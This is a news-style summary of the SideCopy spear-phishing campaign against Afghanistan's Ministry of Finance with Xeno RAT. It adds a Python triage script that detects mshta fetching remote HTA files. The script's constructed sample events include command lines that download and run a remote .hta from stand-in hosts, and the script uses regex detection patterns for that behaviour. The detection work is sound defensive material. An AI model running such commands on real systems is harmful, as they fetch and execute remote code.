As reported by The Hacker News, a spear-phishing campaign, likely orchestrated by the Pakistan-aligned SideCopy group, has been identified targeting Afghanistan's Ministry of Finance with the open-source remote access trojan Xeno RAT. This operation, codenamed Operation XENOFISCAL and analyzed by Seqrite Labs, also ensnared provincial revenue and finance directorates, along with Pashto-speaking government officials.
The campaign begins with a spear-phishing email carrying a ZIP archive that contains a malicious Windows shortcut (LNK) file presented in Pashto, a choice intended to exploit the language's familiarity within the Afghan government. When the shortcut is opened, it launches mshta.exe to fetch a remote HTML Application (HTA) from a compromised Afghan education domain, which in turn runs obfuscated JavaScript. The malware then establishes persistence by masquerading as Microsoft Edge and uses a DLL loader to drop Xeno RAT 1.8.7 together with a decoy document.
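The mshta.exe stage of the chain above is the part a defender can most readily detect from process telemetry: a shortcut opened from Explorer that starts mshta.exe with an http(s) URL on its command line is rarely legitimate. The following Python is an added illustration, not code from the article or from Seqrite's analysis. It runs a small triage pass over constructed, Sysmon-style process-creation events (the hostnames, paths and parent processes are invented for the example) and grades each event on whether mshta fetches a remote HTA and whether the parent is explorer.exe, which is what a double-clicked LNK produces.

```python
import re

# Matches "mshta" or "mshta.exe" as a command token, whether it appears at the
# start of the command line, after a path separator, or inside quotes.
MSHTA_RE = re.compile(r'(?:^|[\\\s"])mshta(?:\.exe)?(?=[\s"]|$)', re.IGNORECASE)

# Any http(s) URL on the command line; a remote HTA is fetched this way.
URL_RE = re.compile(r'https?://[^\s"\'<>]+', re.IGNORECASE)

# Constructed process-creation events in a Sysmon-like shape. Every value
# (domains, paths, parents) is invented for this example and is not an
# indicator from the campaign.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe https://edu-example.invalid/update/index.hta"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Vendor\installer.exe",
     "CommandLine": r"mshta.exe C:\ProgramData\Vendor\setup.hta"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": 'cmd.exe /c "mshta http://203.0.113.7/a.hta"'},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe notes.txt"},
]


def remote_hta_urls(cmdline):
    """Return the http(s) URLs on a command line that invokes mshta, else []."""
    if not MSHTA_RE.search(cmdline):
        return []
    return URL_RE.findall(cmdline)


def classify(event):
    """Severity for one process-creation event.

    'high'   mshta fetching a remote URL with explorer.exe as parent, the
             shape produced by a user double-clicking a malicious LNK
    'medium' mshta fetching a remote URL from any other parent
    'none'   no remote HTA fetch (local .hta files are left to other rules)
    """
    urls = remote_hta_urls(event["CommandLine"])
    if not urls:
        return "none"
    parent = event.get("ParentImage", "").lower()
    if parent.endswith("\\explorer.exe"):
        return "high"
    return "medium"


def triage(events):
    """Return (severity, command line) for every event worth an analyst's look."""
    hits = []
    for event in events:
        severity = classify(event)
        if severity != "none":
            hits.append((severity, event["CommandLine"]))
    return hits


if __name__ == "__main__":
    for severity, cmdline in triage(SAMPLE_EVENTS):
        print(f"[{severity}] {cmdline}")
```

Run against the constructed events, the first record (mshta launched by explorer.exe with a remote URL) is graded high, the cmd.exe wrapper spawned from Word is graded medium because the URL is still there even though mshta is not the image itself, and the installer that runs a local .hta is ignored. In production the same logic belongs in an EDR or SIEM rule keyed on the process image and parent rather than on the command line alone, since an attacker can rename mshta.exe while a copy in System32 still reveals itself by its original file name.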
Xeno RAT is capable of remote command execution, data exfiltration, network tunneling, and system monitoring, including keystroke logging and screenshot capture. SideCopy, part of the broader Transparent Tribe (APT36) umbrella, has previously targeted Indian entities with similar malware. This campaign represents a continuation of malicious cyber activity focused on South Asian targets.
Source: The Hacker News
SideCopy group targets Afghanistan’s Ministry of Finance with Xeno RAT